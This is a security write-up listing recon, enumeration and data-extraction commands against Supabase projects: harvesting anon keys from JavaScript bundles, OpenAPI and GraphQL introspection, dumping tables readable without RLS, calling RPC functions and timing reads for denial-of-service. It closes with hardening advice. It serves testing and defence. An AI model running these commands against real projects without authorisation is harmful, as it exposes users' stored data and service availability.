Some common enumeration, recon and exfiltration methods for Supabase

Authentication

Supabase/PostgREST uses JWTs for authentication. By default, a token carries one of three roles in its role claim: anon, authenticated or service_role. The service_role token is a server-side secret that bypasses all RLS (Row Level Security) policies defined on the tables.

See https://docs.postgrest.org/en/v12/references/auth.html
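Because the role is just a claim in the token payload, you can check which role a key found in the wild actually carries. An exposed service_role key is a far more serious finding than an anon key. Below is a minimal sketch of a hypothetical `jwt_role` helper that uses only coreutils and sed. It assumes the key is a classic JWT (keys in other formats have no payload to decode), and it does not verify the signature.

```bash
#!/usr/bin/env bash
# jwt_role (hypothetical helper): print the "role" claim of a JWT such as a
# Supabase anon or service_role key. The signature is NOT verified.
jwt_role() {
  local payload
  # The payload is the second dot-separated segment, base64url-encoded
  payload=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # base64url drops '=' padding; restore it so base64 -d accepts the input
  case $(( ${#payload} % 4 )) in
    2) payload="${payload}==" ;;
    3) payload="${payload}=" ;;
  esac
  # Decode the JSON payload and print the value of its "role" key
  printf '%s' "$payload" | base64 -d 2>/dev/null \
    | sed -n 's/.*"role"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}
```

For example, `jwt_role "$ANON_KEY"` should print `anon` for a genuine anon key.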

Anon key

The key is shown in Supabase Studio under Settings > API > Project API keys.



It is meant to be public and can often be extracted directly from the application's client-side source code.
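A quick way to do this extraction is to grep the downloaded JavaScript bundles for the project URL and for JWT-shaped strings. Here is a rough sketch using a hypothetical `extract_supabase_config` helper. The patterns assume the default `<ref>.supabase.co` domain and a JWT-format key, so they will miss custom domains and other key formats. Any JWT they match is only a candidate and may not be a Supabase key at all.

```bash
#!/usr/bin/env bash
# extract_supabase_config (hypothetical helper): list Supabase project URLs and
# JWT-shaped strings (candidate anon keys) found in the given files, e.g.
# JavaScript bundles downloaded from the target web app.
extract_supabase_config() {
  # -o: print only the matches, -h: omit file names, -E: extended regex
  grep -ohE 'https://[a-z0-9]+\.supabase\.co|eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+' "$@" \
    | sort -u
}
```

Running it over every bundle at once (`extract_supabase_config *.js`) gives a deduplicated list of project URLs and candidate keys to try.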

Authenticated key

If it is not possible to retrieve the anon key and the project has sign-ups enabled, it is often easier to just register an account with the Supabase project directly and test security with an authenticated JWT. See e.g. https://github.com/lunchcat/sif/blob/a40b78c820da581a9905bcbddcd9c5bb06b198f5/pkg/scan/js/supabase.go#L168

Recon/Enumeration

OpenAPI enumeration

Using the anon key, we can dump the OpenAPI spec of a Supabase project:

```bash
curl "https://<PROJECT_REF>.supabase.co/rest/v1/" -H "apikey: <ANON_KEY>" > openapi_introspection.json
```

The following jq commands can then be used:

```bash
# extract table (and view) names
jq '.definitions | keys[]' openapi_introspection.json
# extract RPC paths
jq '.paths | to_entries | map(select(.key | startswith("/rpc/"))) | from_entries' openapi_introspection.json
```

You can also just copy-paste the JSON into https://editor.swagger.io/ for a quick overview of the whole database structure of the target project.

GraphQL introspection

It is also possible to use pg_graphql (enabled by default on every Supabase project) for enumeration. We can run an introspection query on the whole database with just the project reference and the anon key to obtain all types, tables, views and functions used in the project:

```bash
curl -X POST https://<PROJECT_REF>.supabase.co/graphql/v1 -H 'apiKey: <ANON_KEY>' -H 'Content-Type: application/json' --data-raw '{"query":"query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } }}\nfragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef }}\nfragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue }\nfragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } } }}\n ","operationName":"IntrospectionQuery"}' > graphql_introspection.json
```

The following jq commands can then be used:

```bash
# extract table names
jq '.data.__schema.types[] | select(.name == "Node") | .possibleTypes[]?.name' graphql_introspection.json
# extract table fields
jq '.data.__schema.types[] | select(.name == "<TABLE_NAME>") | .fields[] | { name, type: ( if .type.name != null then .type.name elif .type.ofType != null and .type.ofType.name != null then .type.ofType.name elif .type.ofType.ofType != null and .type.ofType.ofType.name != null then .type.ofType.ofType.name else null end ), description, isDeprecated, deprecationReason}' graphql_introspection.json
```

Enumerating schemas

We can use the error message returned for a restricted schema to list the publicly accessible schemas:

```bash
curl "https://<PROJECT_REF>.supabase.co/rest/v1/<TABLE_NAME>" -H "apikey: <ANON_KEY>" -H "Accept-Profile: inexistent"
# {"code":"PGRST106","details":null,"hint":null,"message":"The schema must be one of the following: public, storage, graphql_public"}
```

See https://docs.postgrest.org/en/v12/references/api/schemas.html#restricted-schemas
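To feed the exposed schemas into further requests, you can turn the error body into a plain list. Below is a minimal sketch with a hypothetical `parse_exposed_schemas` helper. It only recognises the PGRST106 message wording shown above, and other PostgREST versions may phrase the error differently.

```bash
#!/usr/bin/env bash
# parse_exposed_schemas (hypothetical helper): read a PGRST106 error body on
# stdin and print one exposed schema per line.
parse_exposed_schemas() {
  # Keep only the comma-separated schema list from the message text
  sed -n 's/.*"The schema must be one of the following: \([^"]*\)".*/\1/p' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//'
}
```

Pipe the curl request above (with `-s`) into `parse_exposed_schemas`. Each resulting name can then be passed as the `Accept-Profile` value to query tables in that schema.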

Data exfiltration

Retrieve anon role (non-RLS) data for multiple tables

Pipe the table names from the OpenAPI introspection file into curl to query each table. Any table that returns rows to the anon role is readable without authentication, so this quickly shows where RLS policies are missing.
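On larger projects the raw JSON for every table gets noisy. Below is a sketch that condenses the same check into one verdict per table, using two hypothetical helpers, `classify_response` and `scan_tables`. The `limit=1` parameter is an assumption added so that readable tables are not dumped in full. An `empty` verdict can mean either that RLS filtered out every row or that the table really is empty. The `CURL` variable exists only so the loop can be dry-run with a stub.

```bash
#!/usr/bin/env bash
# classify_response (hypothetical helper): turn a PostgREST response body
# into a one-word verdict for the requesting role.
classify_response() {
  case $1 in
    '[]') echo "empty" ;;        # no visible rows: RLS filtered them all, or the table is empty
    '['*) echo "readable" ;;     # at least one row was returned to this role
    *'"code"'*) echo "error" ;;  # PostgREST error object, e.g. permission denied
    *) echo "unknown" ;;
  esac
}

# scan_tables (hypothetical helper): read table names on stdin and print
# "<table><TAB><verdict>" for each one. CURL can be overridden for dry runs.
scan_tables() {
  local ref=$1 key=$2 table body
  while IFS= read -r table; do
    body=$(${CURL:-curl} -s "https://${ref}.supabase.co/rest/v1/${table}?select=*&limit=1" \
      -H "apikey: ${key}")
    printf '%s\t%s\n' "$table" "$(classify_response "$body")"
  done
}
```

Usage: `jq -r '.definitions | keys[]' openapi_introspection.json | scan_tables <PROJECT_REF> "$ANON_KEY"`. Every `readable` line is a table worth a closer look.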

```bash
export ANON_KEY="<ANON_KEY>"
jq -r '.definitions | keys[]' openapi_introspection.json | xargs -I {} sh -c 'echo "$2:"; curl -s "https://<PROJECT_REF>.supabase.co/rest/v1/$2?select=*" -H "apikey: $1"; echo' _ "$ANON_KEY" {}
```

Execute stored procedures

Functions stored in the database (https://supabase.com/docs/guides/database/functions) can be called directly through the REST API at /rest/v1/rpc/<function_name>. A stored procedure essentially stores SQL that is executed directly in the database as the result of an RPC call. Any function the caller's role may execute can therefore be used to run that logic directly against the database, or to cause a DoS if the function is expensive.

Stored procedure names and parameters can be retrieved via the OpenAPI enumeration described above.
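When testing many functions, it can help to wrap the call in a small hypothetical `supabase_rpc` helper that also takes an optional user access token. That way the same function can be exercised as anon and as authenticated. PostgREST determines the role from the JWT in the `Authorization` header, and when no user token is given this sketch sends the anon key there as well. The `CURL` override is only a dry-run hook. Keep in mind that calling a function executes it, including any writes it performs.

```bash
#!/usr/bin/env bash
# supabase_rpc (hypothetical helper): POST a JSON argument object to
# /rest/v1/rpc/<function>.
# Usage: supabase_rpc REF ANON_KEY FUNCTION [JSON_ARGS] [ACCESS_TOKEN]
# Without ACCESS_TOKEN the call is made as the anon role.
supabase_rpc() {
  local ref=$1 key=$2 fn=$3 body=${4:-'{}'} token=${5:-$2}
  ${CURL:-curl} -s -X POST "https://${ref}.supabase.co/rest/v1/rpc/${fn}" \
    -H "apikey: ${key}" \
    -H "Authorization: Bearer ${token}" \
    -H "Content-Type: application/json" \
    -d "${body}"
}
```

For example, `supabase_rpc <PROJECT_REF> "$ANON_KEY" <STORED_PROCEDURE_NAME> '{ "param": "value" }' "$USER_JWT"` repeats the call as an authenticated user. Here `USER_JWT` is a placeholder for a token obtained from a registered account.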

```bash
curl -X POST 'https://<PROJECT_REF>.supabase.co/rest/v1/rpc/<STORED_PROCEDURE_NAME>' -d '{ "param": "value" }' -H "Content-Type: application/json" -H "apikey: <ANON_KEY>"
```

Denial-of-Service risk assessment

Timing the basic anon table scan shows which tables may be at denial-of-service risk due to inefficiently implemented RLS policies.

```bash
export ANON_KEY="<ANON_KEY>"
jq -r '.definitions | keys[]' openapi_introspection.json | xargs -I {} bash -c 'echo "$2:"; time curl -s -o /dev/null "https://<PROJECT_REF>.supabase.co/rest/v1/$2?select=*" -H "apikey: $1"' _ "$ANON_KEY" {}
```

RLS policies are evaluated for every row a query reads. Tables and views with an expensive policy (for example, one that runs a subquery or function call per row) therefore make even a single anonymous read slow, which is potentially exploitable for a DoS.
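Instead of eyeballing `time` output, you can rank tables by the total request time that curl reports through its `-w '%{time_total}'` write-out variable. Below is a sketch with a hypothetical `time_tables` helper. The measured time includes network latency and the size of the returned data, so it only gives a rough relative ranking. A table that is slow to read while returning few or no rows is the interesting case.

```bash
#!/usr/bin/env bash
# time_tables (hypothetical helper): read table names on stdin, time a full
# anon read of each one and print "<seconds><TAB><table>", slowest first.
# CURL can be overridden for dry runs.
time_tables() {
  local ref=$1 key=$2 table seconds
  while IFS= read -r table; do
    # -o /dev/null discards the body; -w prints only curl's total request time
    seconds=$(${CURL:-curl} -s -o /dev/null -w '%{time_total}' \
      "https://${ref}.supabase.co/rest/v1/${table}?select=*" -H "apikey: ${key}")
    printf '%s\t%s\n' "$seconds" "$table"
  done | LC_ALL=C sort -rn
}
```

Usage: `jq -r '.definitions | keys[]' openapi_introspection.json | time_tables <PROJECT_REF> "$ANON_KEY" | head`.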

Hardening a Supabase project

There is a Supabase article on hardening the data API: https://supabase.com/docs/guides/database/hardening-data-api

On top of those, I would suggest just disabling the GraphQL extension altogether if it’s not being used. This removes an unnecessary extra attack vector.
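After disabling the extension (for example with `drop extension if exists pg_graphql;`), it is worth confirming from the outside that the endpoint no longer answers introspection. Below is a minimal sketch with a hypothetical `check_graphql_introspection` helper. It only checks whether `__schema` appears in the response body and makes no assumption about what the endpoint returns once the extension is gone.

```bash
#!/usr/bin/env bash
# check_graphql_introspection (hypothetical helper): send a minimal
# introspection query to pg_graphql and report whether schema data came back.
# CURL can be overridden for dry runs.
check_graphql_introspection() {
  local ref=$1 key=$2 body
  body=$(${CURL:-curl} -s -X POST "https://${ref}.supabase.co/graphql/v1" \
    -H "apikey: ${key}" -H "Content-Type: application/json" \
    --data-raw '{"query":"{ __schema { queryType { name } } }"}')
  case $body in
    *'"__schema"'*) echo "exposed" ;;
    *) echo "not exposed" ;;
  esac
}
```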

Additionally, it would be nice if Supabase allowed hiding the OpenAPI spec route altogether. Exposing it not only makes it super easy for a threat actor to enumerate all tables and views for data exfiltration attempts, but also makes basic intelligence gathering about the database structure and the types of data stored a bit too easy.